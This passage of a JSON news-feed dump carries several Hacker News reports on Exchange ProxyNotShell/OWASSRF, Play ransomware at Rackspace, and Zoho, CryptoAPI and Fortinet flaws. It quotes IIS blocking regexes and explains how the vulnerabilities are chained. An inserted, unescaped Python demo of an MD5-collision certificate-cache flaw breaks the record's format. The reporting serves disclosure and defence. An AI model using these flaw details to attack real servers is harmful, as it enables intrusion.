Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T06:36:00", "type": "thn", "title": "State-Sponsored Hackers Likely Exploited MS Exchange 0-Days Against ~10 Organizations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T12:45:52", "id": "THN:A5B36072ED31304F26AF0879E3E5710E", "href": "https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-10T04:05:08", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjeUWuPrjVRtuLfvZ08ImJeXt0BdQpRXeQ6I0n0SAV_PvlNadxnD9aN7xs4GdR3dnw4vc_xgBx7ZMfuF4JsmZ8SVjY0DMxorkecTx87m3KMhPPwj-eMcuw7qBH0ZOWX2k0C8AUY_BQjxGr0uihjZw9opxQt8RNXIK3HVcztB-5v-tFUuZFDzyfQoLAw/s728-e100/ms.jpg>)\n\nMicrosoft on Friday [disclosed](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) it has made more improvements to the [mitigation method](<https://thehackernews.com/2022/10/mitigation-for-exchange-zero-days.html>) offered as a means to prevent exploitation attempts against the newly disclosed unpatched security flaws in Exchange Server.\n\nTo that end, the tech giant has revised the blocking rule in IIS Manager from \".*autodiscover\\\\.json.*Powershell.*\" to 
\"(?=.*autodiscover\\\\.json)(?=.*powershell).\"\n\nThe list of updated steps to add the URL Rewrite rule is below -\n\n * Open IIS Manager\n * Select Default Web Site\n * In the Feature View, click URL Rewrite\n * In the Actions pane on the right-hand side, click Add Rule(s)\u2026 \n * Select Request Blocking and click OK\n * Add the string \"(?=.*autodiscover\\\\.json)(?=.*powershell)\" (excluding quotes)\n * Select Regular Expression under Using\n * Select Abort Request under How to block and then click OK\n * Expand the rule and select the rule with the pattern: (?=.*autodiscover\\\\.json)(?=.*powershell) and click Edit under Conditions\n * Change the Condition input from {URL} to {UrlDecode:{REQUEST_URI}} and then click OK\n\nAlternatively, users can achieve the desired protections by executing a PowerShell-based Exchange On-premises Mitigation Tool ([EOMTv2.ps1](<https://microsoft.github.io/CSS-Exchange/Security/EOMTv2/>)), which has also been updated to take into account the aforementioned URL pattern.\n\nThe [actively-exploited issues](<https://viz.greynoise.io/tag/exchange-proxynotshell-vuln-check?days=30>), called ProxyNotShell (CVE-2022-41040 and CVE-2022-41082), are yet to be addressed by Microsoft, although with Patch Tuesday right around the corner, the wait may not be for long.\n\nSuccessful weaponization of the flaws could enable an authenticated attacker to chain the two vulnerabilities to achieve remote code execution on the underlying server.\n\nThe tech giant, last week, [acknowledged](<https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html>) that the shortcomings may have been abused by a single state-sponsored threat actor since August 2022 in limited targeted attacks aimed at less than 10 organizations worldwide.\n\n**_Update:_** Microsoft, over the weekend, said that it has once again made a correction to the URL string \u2013 \"(?=.*autodiscover)(?=.*powershell)\" \u2013 to be added to the blocking rule in IIS Manager to 
prevent exploitation attempts.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T05:13:00", "type": "thn", "title": "Microsoft Issues Improved Mitigations for Unpatched Exchange Server Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-10T03:51:40", "id": "THN:8200D2C2E1DD329D680C5E699177551B", "href": "https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-01T06:04:28", "description": "Microsoft officially disclosed that it is investigating two zero-day security vulnerabilities impacting Exchange Server 2013, 2016, and 2019 following [reports of in-the-wild exploitation](<https://thehackernews.com/2022/09/warning-new-unpatched-microsoft.html>).\n\n\"The first vulnerability, identified as [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>), is a Server-Side Request Forgery 
([SSRF](<https://en.wikipedia.org/wiki/Server-side_request_forgery>)) vulnerability, while the second, identified as [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>), allows remote code execution (RCE) when PowerShell is accessible to the attacker,\" the tech giant [said](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>).\n\nThe company also confirmed that it's aware of \"limited targeted attacks\" weaponizing the flaws to obtain initial access to targeted systems, but emphasized that authenticated access to the vulnerable Exchange Server is required to achieve successful exploitation.\n\nThe attacks detailed by Microsoft show that the two flaws are strung together in an exploit chain, with the SSRF bug enabling an authenticated adversary to remotely trigger arbitrary code execution.\n\nThe Redmond-based company further emphasized that it's working on an \"accelerated timeline\" to push a fix, while urging on-premises Microsoft Exchange customers to add a blocking rule in IIS Manager as a temporary workaround to mitigate potential threats.\n\nIt's worth noting that Exchange Online customers are not affected. The steps to add the blocking rule are as follows -\n\n 1. Open the IIS Manager\n 2. Expand the Default Web Site\n 3. Select Autodiscover\n 4. In the Feature View, click URL Rewrite\n 5. In the Actions pane on the right-hand side, click Add Rules\n 6. Select Request Blocking and click OK\n 7. Add String \".*autodiscover\\\\.json.*\\@.*Powershell.*\" (excluding quotes) and click OK\n 8. Expand the rule and select the rule with the Pattern \".*autodiscover\\\\.json.*\\@.*Powershell.*\" and click Edit under Conditions\n 9. Change the condition input from {URL} to {REQUEST_URI}\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-09-30T09:01:00", "type": "thn", "title": "Microsoft Confirms 2 New Exchange Zero-Day Flaws Being Used in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T05:48:11", "id": "THN:6B72050A86FFDCE9A0B2CF6F44293A1B", "href": "https://thehackernews.com/2022/09/microsoft-confirms-2-new-exchange-zero.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-06T06:04:52", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi9curQBhNNFXVb7VMBAzdw4XqdlsRjjQO1TKoTP_j324ubmIjk9pqa624KRULI6wr62I5mCw6kwv5V7wAOuLszOF38jRdG5L0uMRGSF_wbY7B8Tf8xxuDiq7vHa3JRrFkp9bwK0s3z3LdKaWNgmAED48clrraRNSd-7DXt9XvTyxpt1PFJ0gS6hRc6/s728-e100/ms.jpg>)\n\nMicrosoft has revised its mitigation measures for the newly disclosed and actively exploited zero-day flaws in Exchange Server after it was found that they could be trivially bypassed.\n\nThe two vulnerabilities, tracked as CVE-2022-41040 and CVE-2022-41082, have been codenamed [ProxyNotShell](<https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html>) due to similarities to another set of flaws called [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), which the tech giant resolved last year.\n\nIn-the-wild attacks abusing the [shortcomings](<https://kb.cert.org/vuls/id/915563>) have chained the two flaws to gain remote code execution on compromised servers with elevated privileges, leading to the deployment of web shells.\n\nThe Windows maker, which is yet to release a fix for the bugs, has acknowledged that a single state-sponsored threat actor may have been weaponizing the flaws since August 2022 in limited targeted 
attacks.\n\nIn the meantime, the company has made available temporary workarounds to reduce the risk of exploitation by restricting known attack patterns through a rule in the IIS Manager.\n\nHowever, according to security researcher Jang ([@testanull](<https://twitter.com/testanull/status/1576774007826718720>)), the URL pattern can be easily circumvented, with senior vulnerability analyst Will Dormann [noting](<https://twitter.com/wdormann/status/1576922677675102208>) that the block mitigations are \"unnecessarily precise, and therefore insufficient.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhpQsLFSw9UR9_SvNk6WQy9mwfkRcm3XlnjHABkGcn5zq8dy9nknbIRrBwkrbf_VJJvMMFLN_mUcYz8qvRkQqQsJzX0ofT7lPbRq_quwfXfFCfXjlRkKZNj3efBVbrnrgJU3Vi2386QzY6BgMNCEjLdFXD3_yuvqsRn6KGIxA6muukpIgnj2Cmxv06P/s728-e100/ms.jpg>)\n\nMicrosoft has since [revised](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) the URL Rewrite rule (also available as a standalone [PowerShell script](<https://microsoft.github.io/CSS-Exchange/Security/EOMTv2/>)) to take this into account -\n\n * Open IIS Manager\n * Select Default Web Site\n * In the Feature View, click URL Rewrite\n * In the Actions pane on the right-hand side, click Add Rule(s)\u2026\n * Select Request Blocking and click OK\n * Add the string \".*autodiscover\\\\.json.*Powershell.*\" (excluding quotes)\n * Select Regular Expression under Using\n * Select Abort Request under How to block and then click OK\n * Expand the rule and select the rule with the pattern: .*autodiscover\\\\.json.*Powershell.* and click Edit under Conditions\n * Change the Condition input from {URL} to {REQUEST_URI}\n\nIt's not immediately clear when Microsoft plans to push a patch for the two vulnerabilities, but it's possible that they could be shipped as part of Patch Tuesday updates next week on October 11, 2022.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-05T05:31:00", "type": "thn", "title": "Mitigation for Exchange Zero-Days Bypassed! Microsoft Issues New Workarounds", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T04:57:27", "id": "THN:5293CFD6ACCF7BFD2EDDE976C7C06C15", "href": "https://thehackernews.com/2022/10/mitigation-for-exchange-zero-days.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-22T04:09:51", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhTLGmaNN3OFFmSILTclxE-UymYSclEFgrwvp76liyrsFGtPk5wpNGVl-AXdppW10UvY5aPmtLoqkxVC3ifpEx9XH3JarmYqPPQtscOXnAMl0K3lHF2nV6pcyicT2bu5U9BbJFd6hbBBVHswmATwzgzQEMc6GEUPcs4-k1yW0cjoEdfsN0LDRvVh5Ty/s728-e100/email-hacking.png>)\n\nThreat actors affiliated with a ransomware strain known as Play are leveraging a never-before-seen exploit chain that bypasses blocking rules for ProxyNotShell flaws in Microsoft Exchange Server to achieve remote code execution (RCE) through Outlook Web Access ([OWA](<https://en.wikipedia.org/wiki/Outlook_on_the_web>)).\n\n\"The new exploit method bypasses [URL rewrite mitigations](<https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html>) for the [Autodiscover 
endpoint](<https://learn.microsoft.com/en-us/exchange/architecture/client-access/autodiscover>),\" CrowdStrike researchers Brian Pitchford, Erik Iker, and Nicolas Zilio [said](<https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/>) in a technical write-up published Tuesday.\n\nPlay ransomware, which first surfaced in June 2022, has been [revealed](<https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html>) to adopt many tactics employed by other ransomware families such as [Hive](<https://thehackernews.com/2022/11/hive-ransomware-attackers-extorted-100.html>) and [Nokoyawa](<https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html>), the latter of which [upgraded to Rust](<https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust>) in September 2022.\n\nThe cybersecurity company's investigations into several Play ransomware intrusions found that initial access to the target environments was not achieved by directly exploiting [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>), but rather through the OWA endpoint.\n\nDubbed **OWASSRF**, the technique likely takes advantage of another critical flaw tracked as [CVE-2022-41080](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41080>) (CVSS score: 8.8) to achieve privilege escalation, followed by abusing [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) for remote code execution.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh59pwm9Kxv252Uv99amN02oXTHDo8okfVqDQEPqxZy2wZk0tCTHx16xDzABz2QYvABQfBENatlbN2owTSezPh4jYOK-0bGPr_JyWKUPsX1nnLeX5X9za6Rfk5c-juoJI5Q9NT97ANp9X64VSnb_EWUp5s1jYoZJap_uzgruqlI0kYKYqqtMvM5hZQm/s728-e100/email-security.png>)\n\nIt's worth noting that both CVE-2022-41040 and CVE-2022-41080 stem from a case of server-side request forgery 
([SSRF](<https://owasp.org/www-community/attacks/Server_Side_Request_Forgery>)), which permits an attacker to access unauthorized internal resources, in this case the [PowerShell remoting](<https://learn.microsoft.com/en-us/powershell/exchange/exchange-management-shell>) service.\n\nCrowdStrike said the successful initial access enabled the adversary to drop legitimate Plink and AnyDesk executables to maintain persistent access as well as take steps to purge Windows Event Logs on infected servers to conceal the malicious activity.\n\nAll three vulnerabilities were addressed by Microsoft as part of its [Patch Tuesday updates](<https://thehackernews.com/2022/11/install-latest-windows-update-asap.html>) for November 2022. It's, however, unclear if CVE-2022-41080 was actively exploited as a zero-day alongside CVE-2022-41040 and CVE-2022-41082.\n\nThe Windows maker, for its part, has tagged CVE-2022-41080 with an \"Exploitation More Likely\" assessment, implying it's possible for an attacker to create exploit code that could be utilized to reliably weaponize the flaw.\n\nCrowdStrike further noted that a proof-of-concept (PoC) Python script [discovered](<https://twitter.com/Purp1eW0lf/status/1602989967776808961>) and leaked by Huntress Labs researcher Dray Agha last week may have been put to use by the Play ransomware actors for initial access.\n\nThis is evidenced by the fact that the execution of the Python script made it possible to \"replicate the logs generated in recent Play ransomware attacks.\"\n\n\"Organizations should apply the November 8, 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method,\" the researchers said.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T07:41:00", "type": "thn", "title": "Ransomware Hackers Using New Way to Bypass MS Exchange ProxyNotShell Mitigations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41080", "CVE-2022-41082"], "modified": "2022-12-22T03:36:49", "id": "THN:DF2B360775F2B7F0C76A360FDA254FBA", "href": "https://thehackernews.com/2022/12/ransomware-hackers-using-new-way-to.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-07T18:11:10", "description": "Cloud services provider Rackspace on Thursday confirmed that the ransomware gang known as **Play** was responsible for last month's breach.\n\nThe security incident, which took place on December 2, 2022, leveraged a previously unknown security exploit to gain initial access to the Rackspace Hosted Exchange email environment.\n\n\"This zero-day exploit is associated with [CVE-2022-41080](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41080>),\" the Texas-based company [said](<https://status.apps.rackspace.com/index/viewincidents?group=2>). 
\"Microsoft disclosed CVE-2022-41080 as a privilege escalation vulnerability and did not include notes for [it] being part of a remote code execution chain that was exploitable.\"\n\nRackspace's forensic investigation found that the threat actor accessed the Personal Storage Table ([.PST](<https://en.wikipedia.org/wiki/Personal_Storage_Table>)) of 27 customers out of a total of nearly 30,000 customers on the Hosted Exchange email environment.\n\nHowever, the company said there is no evidence the adversary viewed, misused, or distributed the customers' emails or data from those personal storage folders. It further said it intends to retire its Hosted Exchange platform as part of a planned migration to Microsoft 365.\n\nIt is not currently known if Rackspace paid a ransom to the cybercriminals, but the disclosure follows a report from CrowdStrike last month that shed light on the new technique, dubbed [OWASSRF](<https://thehackernews.com/2022/12/ransomware-hackers-using-new-way-to.html>), employed by the Play ransomware actors.\n\nThe mechanism targets Exchange servers that are unpatched against the ProxyNotShell vulnerabilities ([CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>)) but have in place URL rewrite mitigations for the Autodiscover endpoint.\n\nThis involves an exploit chain comprising CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution in a manner that bypasses the blocking rules through Outlook Web Access (OWA). 
The flaws were addressed by Microsoft in November 2022.\n\nThe Windows maker, in a statement shared with The Hacker News, urged customers to prioritize installing its [November 2022 Exchange Server updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2022-exchange-server-security-updates/ba-p/3669045>) and noted that the reported method targets vulnerable systems that have not applied the latest fixes.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-06T09:01:00", "type": "thn", "title": "Rackspace Confirms Play Ransomware Gang Responsible for Recent Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41080", "CVE-2022-41082"], "modified": "2023-01-07T17:47:30", "id": "THN:A356406D6A8ADF4F4592DBAAEB6CDA74", "href": "https://thehackernews.com/2023/01/rackspace-confirms-play-ransomware-gang.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-26T06:04:20", "description": "The U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) on Thursday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/22/cisa-has-added-one-known-exploited-vulnerability-catalog>) a recently disclosed security flaw in Zoho ManageEngine to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) Catalog, citing evidence of active exploitation.\n\n\"Zoho ManageEngine PAM360, Password Manager Pro, and Access Manager Plus contain an unspecified vulnerability which allows for remote code execution,\" the agency said in a notice.\n\nThe [critical vulnerability](<https://www.manageengine.com/products/passwordmanagerpro/advisory/rce.html>), tracked as [CVE-2022-35405](<https://nvd.nist.gov/vuln/detail/CVE-2022-35405>), is rated 9.8 out of 10 for severity on the CVSS scoring system, and was patched by Zoho as part of updates released on June 24, 2022.\n\nAlthough the exact nature of the flaw remains unknown, the India-based enterprise solutions company [said](<https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html>) it addressed the issue by removing the vulnerable components that could lead to the remote execution of arbitrary code.\n\nZoho has also warned of the public availability of a proof-of-concept (PoC) exploit for the vulnerability, making it imperative that customers move quickly to upgrade the instances of Password Manager Pro, PAM360 and Access Manager Plus as soon as possible.\n\nThe cybersecurity agency did not share additional specifics on how the flaw is being weaponized and how widespread the exploitation efforts are, but data gathered by GreyNoise shows that [in-the-wild attacks](<https://viz.greynoise.io/tag/zoho-password-manager-pro-xml-rpc-rce-attempt?days=30>) were detected on September 7, 2022.\n\nIn light of active exploitation of the vulnerability, Federal Civilian Executive Branch (FCEB) agencies are required to apply the vendor-provided patches by 
October 13, 2022.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T10:21:00", "type": "thn", "title": "CISA Warns of Hackers Exploiting Recent Zoho ManageEngine Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-09-26T04:47:39", "id": "THN:8EF2325CBAF6720C51D9798925FE61A0", "href": "https://thehackernews.com/2022/09/cisa-warns-of-hackers-exploiting-recent.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-26T14:54:35", "description": "Proof-of-concept (PoC) code has been released for a now-patched high-severity security flaw in the Windows CryptoAPI that the U.S. National Security Agency (NSA) and the U.K. 
National Cyber Security Centre (NCSC) reported to Microsoft last year.\n\nTracked as **CVE-2022-34689** (CVSS score: 7.5), the spoofing vulnerability was addressed by the tech giant as part of Patch Tuesday updates released in August 2022, but was only publicly disclosed two months later on October 11, 2022.\n\n\"An attacker could manipulate an existing public [x.509 certificate](<https://en.wikipedia.org/wiki/X.509>) to spoof their identity and perform actions such as authentication or code signing as the targeted certificate,\" Microsoft [said](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34689>) in an advisory released at the time.\n\nThe [Windows CryptoAPI](<https://learn.microsoft.com/en-us/windows/win32/seccrypto/cryptoapi-system-architecture>) offers an interface for developers to add cryptographic services such as encryption/decryption of data and authentication using digital certificates to their applications.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEitgEFWKe9cmmPiCeNUFeUHkiQrOP1gUF8DKPscD6rnc5kzIBJ6dfhlEIMJw7FQRTLYapnN-A4XYC5HJJTJPiGRHlJszCPjxLdiwYvHwlJxEdt4f1-pt1O3DmHY3xcTeKNtRz15wmRh-nHbvtkF69Sal7AuOAzPFA0X5TbYWWfhYuBZrWu1hW0fQC8p/s728-rj-e365/exploit.gif>)\n\nWeb security company Akamai, which [released](<https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2022-34689>) the PoC, [said](<https://www.akamai.com/blog/security-research/exploiting-critical-spoofing-vulnerability-microsoft-cryptoapi>) CVE-2022-34689 is rooted in the fact that the vulnerable piece of code that's designed to accept an x.509 certificate carried out a check that solely relied on the certificate's MD5 fingerprint.\n\nMD5, a message-digest algorithm used for hashing, is essentially [cryptographically broken](<https://thehackernews.com/2022/11/french-electricity-provider-fined-for.html>) as of December 2008 owing to the risk of [birthday attacks](<https://en.wikipedia.org/wiki/Birthday_attack>), a cryptanalytic 
method used to find collisions in a hash function.\n\nThe net effect of this shortcoming is that it opens the door for a bad actor to serve a modified version of a legitimate certificate to a victim app, and then create a new certificate whose MD5 hash collides with the rigged certificate and use it to masquerade as the original entity.\n\nIn other words, the flaw could be weaponized by a rogue interloper to stage a mallory-in-the-middle ([MitM](<https://en.wikipedia.org/wiki/Man-in-the-middle_attack>)) attack and redirect users relying on an old version of Google Chrome (version 48 and earlier) to an arbitrary website of the actor's choosing simply because the susceptible version of the web browser trusts the malicious certificate.\n\n\"Certificates play a major role in identity verification online, making this vulnerability lucrative for attackers,\" Akamai said.\n\nAlthough the flaw has a limited scope, the Massachusetts-headquartered firm pointed out \"there is still a lot of code that uses this API and might be exposed to this vulnerability, warranting a patch even for discontinued versions of Windows, like Windows 7.\"\n
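The check described above, one that remembers an already-verified certificate by its MD5 fingerprint alone, can be modelled to show why a colliding certificate inherits the cached trust and why keying the cache on the certificate's full content closes the hole. The Python below is an added example for this page, not Akamai's PoC and not the Windows CryptoAPI code: the two cache classes model the behaviour the article describes, not the actual implementation; the certificates are constructed byte strings; `toy_verify` is a placeholder trust decision; and the fingerprint is MD5 truncated to two bytes only so that a collision can be brute-forced inside the script. Against full MD5 the collision is the attacker's offline work, which is what the birthday-attack remark above refers to.

```python
import hashlib
import itertools


def weak_fingerprint(cert_der: bytes) -> bytes:
    """Stand-in for the MD5 thumbprint the vulnerable check relied on.
    Truncated to 2 bytes purely so a collision can be found by brute force
    here; the real flaw involved full MD5, where finding the collision is the
    attacker's offline work."""
    return hashlib.md5(cert_der).digest()[:2]


class FingerprintKeyedCache:
    """Vulnerable shape: a certificate seen once and verified is remembered by
    fingerprint only; any later certificate with the same fingerprint inherits
    the cached verdict without being compared or verified again."""

    def __init__(self):
        self._verdicts = {}

    def is_trusted(self, cert_der: bytes, verify) -> bool:
        key = weak_fingerprint(cert_der)
        if key not in self._verdicts:
            self._verdicts[key] = verify(cert_der)
        return self._verdicts[key]


class ContentKeyedCache:
    """Hardened shape: key on SHA-256 of the full DER and, on a hit, still
    confirm the stored bytes are identical before reusing the verdict, so the
    trust decision never depends on the hash alone."""

    def __init__(self):
        self._entries = {}

    def is_trusted(self, cert_der: bytes, verify) -> bool:
        key = hashlib.sha256(cert_der).digest()
        hit = self._entries.get(key)
        if hit is not None and hit[0] == cert_der:
            return hit[1]
        verdict = verify(cert_der)
        self._entries[key] = (cert_der, verdict)
        return verdict


def find_colliding_impostor(target_der: bytes, prefix: bytes = b"impostor-cert-") -> bytes:
    """Brute-force a different byte string with the same weak fingerprint
    (feasible only because the fingerprint is truncated)."""
    want = weak_fingerprint(target_der)
    for n in itertools.count():
        candidate = prefix + str(n).encode()
        if candidate != target_der and weak_fingerprint(candidate) == want:
            return candidate


# Constructed stand-in for a DER-encoded certificate; toy_verify is a placeholder
# trust decision that accepts only the genuine one.
GENUINE = b"genuine-cert-for-example.test"


def toy_verify(cert_der: bytes) -> bool:
    return cert_der == GENUINE


def demo() -> dict:
    """Victim first sees the genuine certificate (verified and cached), then is
    handed the colliding impostor; report what each cache decides."""
    impostor = find_colliding_impostor(GENUINE)
    vuln, fixed = FingerprintKeyedCache(), ContentKeyedCache()
    vuln.is_trusted(GENUINE, toy_verify)
    fixed.is_trusted(GENUINE, toy_verify)
    return {
        "impostor_trusted_by_vulnerable": vuln.is_trusted(impostor, toy_verify),
        "impostor_trusted_by_fixed": fixed.is_trusted(impostor, toy_verify),
    }


if __name__ == "__main__":
    print(demo())
```

The byte-for-byte comparison on a cache hit is the part that makes any collision irrelevant; switching the key to SHA-256 alone narrows the exposure, but the comparison removes the dependency on the hash entirely.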
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-26T14:52:00", "type": "thn", "title": "Researchers Release PoC Exploit for Windows CryptoAPI Bug Discovered by NSA", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34689"], "modified": "2023-01-26T14:52:17", "id": "THN:40CDBC6B017F89BD673FA2F8C3CA1B06", "href": "https://thehackernews.com/2023/01/researchers-release-poc-exploit-for.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-08T06:05:02", "description": "Fortinet has privately warned its customers of a security flaw affecting FortiGate firewalls and FortiProxy web proxies that could potentially allow an attacker to perform unauthorized actions on susceptible devices.\n\nTracked as **CVE-2022-40684** (CVSS score: 9.6), the critical flaw relates to an [authentication bypass vulnerability](<https://twitter.com/Gi7w0rm/status/1578299492822003712>) that may permit an unauthenticated adversary to carry out arbitrary operations on the administrative interface via a specially crafted HTTP(S) request.\n\nThe issue impacts the following versions, and has been addressed in FortiOS versions 
